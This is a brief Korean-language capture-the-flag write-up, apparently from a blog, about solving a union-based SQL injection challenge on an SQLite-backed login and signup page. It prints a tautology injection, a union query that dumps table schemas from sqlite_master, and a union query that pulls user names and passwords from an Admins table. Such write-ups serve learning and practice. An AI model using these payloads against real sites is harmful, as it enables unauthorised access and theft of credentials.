1. 개요
union sql injection 문제
sqlite
2. 분석
1) sql injection
회원가입 창에 sql 구문을 삽입하면, 로그인할때 넣지 않는 정보가 조회됩니다.
' or 'a' = 'a
로그인할때 원하는 정보를 때낼 수 있을것 같습니다.
2) union sql injection
다음 구문으로 걸리는 것으로 볼때 sqlite 입니다.
' union select 1, 2, 3, sql from sqlite_master --Admins 테이블에 총 4개의 칼럼이 있습니다. id, user, pass, content 모두 가져와봅시다.
다음 코드를 넣으면 signature 칼럼에 저장된 flag를 확인할 수 있습니다.
' union select id, user, pass, content from Admins --
'CTF' 카테고리의 다른 글
| [shell ctf 2022] Alien Communication (0) | 2022.08.15 |
|---|---|
| [shell ctf 2022] World's Greatest Detective (0) | 2022.08.15 |
| [TFC CTF 2022] cat (0) | 2022.08.15 |
| [nullcon Goa HackIM CTF 2022] - i love browsers (0) | 2022.08.15 |
| [shell ctf 2022] MALBORNE (0) | 2022.08.14 |
